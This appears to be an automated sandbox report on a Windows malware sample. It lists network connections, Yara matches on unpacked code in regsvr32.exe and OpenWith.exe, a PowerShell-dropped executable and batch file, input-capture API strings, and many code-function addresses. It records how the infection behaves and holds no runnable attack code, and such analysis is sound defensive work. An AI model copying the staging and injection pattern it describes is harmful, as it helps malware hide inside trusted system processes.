Source: unknown	Network traffic detected: HTTP traffic on port 58783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56504
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56505
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56868
Source: unknown	Network traffic detected: HTTP traffic on port 57719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57831
Source: unknown	Network traffic detected: HTTP traffic on port 58702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55412
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55413
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58921
Source: unknown	Network traffic detected: HTTP traffic on port 58987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55516 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55388 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55829
Source: unknown	Network traffic detected: HTTP traffic on port 55984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56530 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55700
Source: unknown	Network traffic detected: HTTP traffic on port 56713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59073
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59072
Source: unknown	Network traffic detected: HTTP traffic on port 55620 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57652 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55958
Source: unknown	Network traffic detected: HTTP traffic on port 56141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56921
Source: unknown	Network traffic detected: HTTP traffic on port 58129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56920
Source: unknown	Network traffic detected: HTTP traffic on port 56349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59123 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55594 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59089
Source: unknown	Network traffic detected: HTTP traffic on port 56140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57332 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57901
Source: unknown	Network traffic detected: HTTP traffic on port 55334 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55960
Source: unknown	Network traffic detected: HTTP traffic on port 58553 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58530 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56426 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59091
Source: unknown	Network traffic detected: HTTP traffic on port 56036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56948
Source: unknown	Network traffic detected: HTTP traffic on port 58244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56636 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55854
Source: unknown	Network traffic detected: HTTP traffic on port 58106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56946
Source: unknown	Network traffic detected: HTTP traffic on port 58575 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58618 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57309 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56505 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58616
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58618
Source: unknown	Network traffic detected: HTTP traffic on port 59091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55465
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57523
Source: unknown	Network traffic detected: HTTP traffic on port 58039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58446 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56556
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57524
Source: unknown	Network traffic detected: HTTP traffic on port 58423 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56557
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55594
Source: unknown	Network traffic detected: HTTP traffic on port 56374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57652
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55596
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56322
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57653
Source: unknown	Network traffic detected: HTTP traffic on port 55490 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57373 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58509
Source: unknown	Network traffic detected: HTTP traffic on port 59004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57416
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58869
Source: unknown	Network traffic detected: HTTP traffic on port 58704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57418
Source: unknown	Network traffic detected: HTTP traffic on port 57459 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56686
Source: unknown	Network traffic detected: HTTP traffic on port 55284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56324

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:55200 version: TLS 1.2

Source: regsvr32.exe, 00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_a8751e8d-7

Source: regsvr32.exe, 00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_03e342c0-7

Source: Yara match	File source: 14.3.OpenWith.exe.1f9e0750000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.OpenWith.exe.1f9e0470000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.OpenWith.exe.1f9e0470000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.regsvr32.exe.1c000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.regsvr32.exe.1c2e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.OpenWith.exe.1f9e0750000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.regsvr32.exe.1c000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.regsvr32.exe.1c2e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.1634556550.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1625000511.000000001C000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OpenWith.exe PID: 5208, type: MEMORYSTR

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\Desktop\utox_x86_x64.exe			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\ajbs50ul.bat			Jump to dropped file

Source: C:\Users\user\Desktop\utox_x86_x64.exe

Process Stats: CPU usage > 49%

Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D277000 NtWriteFile,WaitForSingleObject,	4_2_00007FF63D277000
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D276EE0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,	4_2_00007FF63D276EE0
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_1BA051B4 NtQueryInformationProcess,	9_2_1BA051B4
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_1BA056A8 NtQuerySystemInformation,NtQuerySystemInformation,lstrcmpiW,CloseHandle,free,	9_2_1BA056A8
Source: C:\Windows\System32\OpenWith.exe	Code function: 14_3_000001F9DF9D30C7 calloc,NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,RtlFreeHeap,RtlFreeHeap,	14_3_000001F9DF9D30C7
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0407000 NtWriteFile,WaitForSingleObject,	18_2_00007FF7F0407000
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0406EE0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,	18_2_00007FF7F0406EE0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB62688 NtAcceptConnectPort,	18_2_000002A4ACB62688
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB6288C NtAcceptConnectPort,	18_2_000002A4ACB6288C

Source: C:\Users\Public\ajbs50ul.bat

Code function: 4_2_00007FF63D276190: memcpy,DeviceIoControl,CloseHandle,CloseHandle,GetLastError,

4_2_00007FF63D276190

Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D27B630	4_2_00007FF63D27B630
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2794D0	4_2_00007FF63D2794D0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D222FE9	4_2_00007FF63D222FE9
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2ADEF0	4_2_00007FF63D2ADEF0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2CBF20	4_2_00007FF63D2CBF20
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D26FF10	4_2_00007FF63D26FF10
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2CBDE0	4_2_00007FF63D2CBDE0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D253DD0	4_2_00007FF63D253DD0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D299E0B	4_2_00007FF63D299E0B
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2AFE00	4_2_00007FF63D2AFE00
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2BA0E0	4_2_00007FF63D2BA0E0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2D40C0	4_2_00007FF63D2D40C0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D29C120	4_2_00007FF63D29C120
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2D7FA0	4_2_00007FF63D2D7FA0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D22FF83	4_2_00007FF63D22FF83
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2AFFF0	4_2_00007FF63D2AFFF0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D253FB7	4_2_00007FF63D253FB7
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2B2030	4_2_00007FF63D2B2030
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D26DA50	4_2_00007FF63D26DA50
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D281A40	4_2_00007FF63D281A40
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D283AA0	4_2_00007FF63D283AA0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D23BA80	4_2_00007FF63D23BA80
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2D7AC0	4_2_00007FF63D2D7AC0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D239B30	4_2_00007FF63D239B30
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2C5B00	4_2_00007FF63D2C5B00
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D251B00	4_2_00007FF63D251B00
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D28F960	4_2_00007FF63D28F960
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2AB9B0	4_2_00007FF63D2AB9B0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D221A31	4_2_00007FF63D221A31
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D23DC80	4_2_00007FF63D23DC80
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2D5CE0	4_2_00007FF63D2D5CE0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D255CC0	4_2_00007FF63D255CC0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D26DD00	4_2_00007FF63D26DD00
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D293B40	4_2_00007FF63D293B40
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2BDBE0	4_2_00007FF63D2BDBE0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2C9BC0	4_2_00007FF63D2C9BC0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D29D671	4_2_00007FF63D29D671
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D22565B	4_2_00007FF63D22565B
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D231665	4_2_00007FF63D231665
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2AD6A8	4_2_00007FF63D2AD6A8
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2BF730	4_2_00007FF63D2BF730
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2CB720	4_2_00007FF63D2CB720
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2AF5F0	4_2_00007FF63D2AF5F0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2675F0	4_2_00007FF63D2675F0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2D15DD	4_2_00007FF63D2D15DD
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2515E0	4_2_00007FF63D2515E0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2995B6	4_2_00007FF63D2995B6
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2AF840	4_2_00007FF63D2AF840
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2918A0	4_2_00007FF63D2918A0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D29D887	4_2_00007FF63D29D887
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2A9920	4_2_00007FF63D2A9920
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D287770	4_2_00007FF63D287770
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2B9750	4_2_00007FF63D2B9750
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2C1780	4_2_00007FF63D2C1780
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D22F7E0	4_2_00007FF63D22F7E0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D24B800	4_2_00007FF63D24B800
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D29B7FD	4_2_00007FF63D29B7FD
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D243290	4_2_00007FF63D243290
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2D7330	4_2_00007FF63D2D7330
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D277170	4_2_00007FF63D277170
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2BD160	4_2_00007FF63D2BD160
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D23D1D0	4_2_00007FF63D23D1D0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D24B200	4_2_00007FF63D24B200
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2AF440	4_2_00007FF63D2AF440
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2934B6	4_2_00007FF63D2934B6
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2C7530	4_2_00007FF63D2C7530
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D25D520	4_2_00007FF63D25D520
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2C3350	4_2_00007FF63D2C3350
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D23B350	4_2_00007FF63D23B350
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2D5410	4_2_00007FF63D2D5410
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D272E70	4_2_00007FF63D272E70
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D22EDB4	4_2_00007FF63D22EDB4
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D250D80	4_2_00007FF63D250D80
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2CADE0	4_2_00007FF63D2CADE0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D25F060	4_2_00007FF63D25F060
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2AF0A0	4_2_00007FF63D2AF0A0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D28D0A0	4_2_00007FF63D28D0A0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2ACFCB	4_2_00007FF63D2ACFCB
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D23F030	4_2_00007FF63D23F030
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D264AC0	4_2_00007FF63D264AC0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2C2B00	4_2_00007FF63D2C2B00
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D29A990	4_2_00007FF63D29A990
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2A8A20	4_2_00007FF63D2A8A20
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2CEC60	4_2_00007FF63D2CEC60
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D298CAC	4_2_00007FF63D298CAC
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2C8CF0	4_2_00007FF63D2C8CF0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2C0CE0	4_2_00007FF63D2C0CE0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D28ED00	4_2_00007FF63D28ED00
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D262B80	4_2_00007FF63D262B80
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2C4BF0	4_2_00007FF63D2C4BF0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D23AC30	4_2_00007FF63D23AC30
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D268C00	4_2_00007FF63D268C00
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2C06A0	4_2_00007FF63D2C06A0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2326E2	4_2_00007FF63D2326E2
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2C6710	4_2_00007FF63D2C6710
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D254579	4_2_00007FF63D254579
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D260870	4_2_00007FF63D260870
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D23C860	4_2_00007FF63D23C860
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2B2920	4_2_00007FF63D2B2920
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2A4920	4_2_00007FF63D2A4920
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2C4750	4_2_00007FF63D2C4750
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D25A740	4_2_00007FF63D25A740
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2927A4	4_2_00007FF63D2927A4
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2347CD	4_2_00007FF63D2347CD
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D240820	4_2_00007FF63D240820
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D29E23A	4_2_00007FF63D29E23A
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2CA2A0	4_2_00007FF63D2CA2A0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2682A0	4_2_00007FF63D2682A0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D22E28F	4_2_00007FF63D22E28F
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D23C170	4_2_00007FF63D23C170
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2B41B0	4_2_00007FF63D2B41B0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D24E180	4_2_00007FF63D24E180
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2CC1F0	4_2_00007FF63D2CC1F0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D23446C	4_2_00007FF63D23446C
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D23A4A0	4_2_00007FF63D23A4A0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2BE4C0	4_2_00007FF63D2BE4C0
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2B8520	4_2_00007FF63D2B8520
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2AC358	4_2_00007FF63D2AC358
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2AC356	4_2_00007FF63D2AC356
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2803A0	4_2_00007FF63D2803A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB4B394DFB	5_2_00007FFB4B394DFB
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_3_028C18D7	9_3_028C18D7
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_028C08A4	9_2_028C08A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_028C18D7	9_2_028C18D7
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_1BA04A54	9_2_1BA04A54
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_1BA09FFC	9_2_1BA09FFC
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_1BA05BC0	9_2_1BA05BC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_1BA01500	9_2_1BA01500
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_1BA02F00	9_2_1BA02F00
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_1BA0870C	9_2_1BA0870C
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_1BA0710C	9_2_1BA0710C
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_1BA03CEC	9_2_1BA03CEC
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_1BA08A58	9_2_1BA08A58
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_1BA1BBA3	9_2_1BA1BBA3
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_1BA13AEB	9_2_1BA13AEB
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_1BA12243	9_2_1BA12243
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFB4B3A098D	9_2_00007FFB4B3A098D
Source: C:\Windows\System32\OpenWith.exe	Code function: 14_3_000001F9DDF20967	14_3_000001F9DDF20967
Source: C:\Windows\System32\OpenWith.exe	Code function: 14_3_000001F9DF9D5E7C	14_3_000001F9DF9D5E7C
Source: C:\Windows\System32\OpenWith.exe	Code function: 14_3_000001F9DF9D4A38	14_3_000001F9DF9D4A38
Source: C:\Windows\System32\OpenWith.exe	Code function: 14_3_000001F9DF9D2C3C	14_3_000001F9DF9D2C3C
Source: C:\Windows\System32\OpenWith.exe	Code function: 14_3_000001F9DF9D557C	14_3_000001F9DF9D557C
Source: C:\Windows\System32\OpenWith.exe	Code function: 14_3_000001F9DF9D1BA6	14_3_000001F9DF9D1BA6
Source: C:\Windows\System32\OpenWith.exe	Code function: 14_3_000001F9DF9D279C	14_3_000001F9DF9D279C
Source: C:\Windows\System32\OpenWith.exe	Code function: 14_3_000001F9DF9D24F7	14_3_000001F9DF9D24F7
Source: C:\Windows\System32\OpenWith.exe	Code function: 14_3_000001F9DF9D58FC	14_3_000001F9DF9D58FC
